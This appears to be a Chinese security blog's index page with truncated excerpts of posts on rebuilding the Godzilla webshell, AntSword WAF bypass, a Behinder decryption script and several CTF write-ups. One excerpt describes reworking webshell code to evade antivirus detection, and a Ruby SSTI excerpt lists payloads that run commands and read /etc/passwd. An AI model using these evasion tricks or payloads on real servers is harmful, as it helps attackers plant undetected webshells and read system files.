哥斯拉二开从0到1-(2)
有小伙伴提议说,我们上个文章改了一下哥斯拉的流量,但是在实际的应用中,我们打战肯定要先传木马落地,如果不能落地,那么你流量改的再好,其实也没有意义,想想,确实也是。没有第一步上传文件,哪里存在流量呢。 那么这次咱们来做一下免杀。在实际的应用中,似乎我们经常碰到安全设备,奈何咱这也没有啥安全设备,我们就采用常见的厂商的在线杀软吧。 php我们用默认生成的文件, 拖到d盾中,看一下 会报3级的双层变量,那好办,拿出来就行 让他先等于一个变量,在传递就可以了。 完事之后,就可以了 没有a.php了。 河马报毒,我们使用fuzz方法看一下哪里有问题。 这里经过fuzz,这里有$qianxinITUfjjXmxo2($_POST[$qianxinw7hJzkKxyi])的时候,那么就报毒,那简单,直接给他拆出来,用变量写。 这样写,就可以了 这里本地版的河马是没有问题了,但是吧,在线版的河马就是过不去,只要出现eval,就直接报。暂时没有太好的办法。加密也行,不过比较麻烦。 像d盾河马这种都是静态查杀的,他不管你里面的内容是什么,出现eval这种或者eval() ...
哥斯拉二开从0到1
最近学习了一下冰蝎和哥斯拉的二开,但也只是学习了一丢丢皮毛,这里记录一下。 准备php5.2 php7.4 java 1.8 准备工作,这里还是建议使用idea,我用vscode 调,第一步配环境就给我卡死了,调了很久都没有调明白,太菜了。 首先致敬一下原版哥斯拉,原版地址https://github.com/BeichenDream/Godzilla 我们这里使用的最新的v4.0.1-godzilla版本,进行逆向及二开。 反编译网址,https://www.decompiler.com/,直接拖入jar包即可,很方便。 当然也可以使用idea的插件进行反编译,都一样。 ok开始 环境搭建先改个名称试试看 下载好原版哥斯拉,然后拖到反编译网站,反编译完成后会看到一个压缩包,解压。 然后新建一个lib目录,将原版的godzilla拖进去,在将刚刚反编译后的目录拖到项目目录下 接着建立依赖关系。 settings->Project...
各种脚本
冰蝎4,爆破1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859from Crypto.Cipher import AESfrom Crypto.Util.Padding import unpadimport base64import hashlibdef decrypt_aes_ecb(ciphertext, key): cipher = AES.new(key.encode(), AES.MODE_ECB) decrypted_bytes = cipher.decrypt(base64.b64decode(ciphertext)) decrypted_text = unpad(decrypted_bytes, AES.block_size).decode('utf-8') return decrypted_text def...
第一届帕鲁杯-CTF应急响应挑战赛部分wp
赛题:https://pan.baidu.com/s/1NtC9RkO2MgG__oTffWYiRw?pwd=kc2y 赛题文件:应急响应模块说明手册.pdf 应急响应模块说明手册.pdf 应急响应-1题目要求:找到JumpServer堡垒机中flag标签的值。 提交格式:[堡垒机中flag标签的值] 登上jumpserver就可以了点控制台的更多选项里面有个标签值即可 应急响应-2题目要求:提交攻击者第一次登录时间。 提交格式:[2024/00/00/00:00:00]找到日志审计,查看登录日志,选一下时间,近一年的, ip为192.168.20.123的时间 flag : [2024/04/11/14:21:18] 应急响应-3题目要求:提交攻击者源IP。 提交格式:[0.0.0.0] 因为后面test01的用户执行了jump...
antsword-bypasswaf
antsword-php改造1.前置知识这里笔者不在讲解antsword的功能等等了,这里直接看一下蚁剑的核心文件。 123456789101112131415161718192021222324252627282930313233343536373839404142# $ tree -l 1 -d ./── base├── core│ ├── asp│ │ ├── decoder│ │ ├── encoder│ │ └── template│ │ └── database│ ├── aspx│ │ ├── decoder│ │ ├── encoder│ │ └── template│ │ └── database│ ├── custom│ │ ├── decoder│ │ ├── encoder│ │ └── template│ │ └── database│ ├── php│ │ ├── decoder│ │ ├──...
nssctfweb刷题记录
[GDOUCTF 2023]泄露的伪装 orzorz.php 12345678910111213<?phperror_reporting(0);if(isset($_GET['cxk'])){ $cxk=$_GET['cxk']; if(file_get_contents($cxk)=="ctrl"){ echo $flag; }else{ echo "洗洗睡吧"; }}else{ echo "nononoononoonono";}?> nononoononoonono http://node5.anna.nssctf.cn:28206/orzorz.php?cxk=data://text/plain,ctrl [NISACTF...
polarctfre刷题记录
shell32bit 有upx的壳,解一下 ida即可 shift+f12 加加减减
my2023
...
HGAME-2024-WEEK-2-部分wp
WEBWhat the cow say?经过测试是ruby的ssti,默认的输入有给了尖括号了,而且我看网上的payload,都带= 123456789<%= system("whoami") %> #Execute code<%= Dir.entries('/') %> #List folder<%= File.open('/etc/passwd').read %> #Read file<%= system('cat /etc/passwd') %><%= `ls /` %><%= IO.popen('ls /').readlines() %><% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%><% require...
BeginCTF部分wp
miscTupper下载到压缩包后,解压可以看到有许多txt文件,每个里面可能是base64,写个脚本提取出来(找gpt) 1234567891011121314151617181920import os# 指定目录路径directory = 'G:\\ctf\\tupper'# 指定输出文件路径output_file = 'D:\\vscodework\\ctf\\beginctf\\output.txt'# 获取目录下的所有文件名,并按数字排序file_names = [f for f in os.listdir(directory) if f.endswith('.txt')]file_names.sort(key=lambda x: int(x[:-4]))# 遍历文件名列表,并将内容写入输出文件中with open(output_file, 'w') as f: for file_name in file_names: file_path =...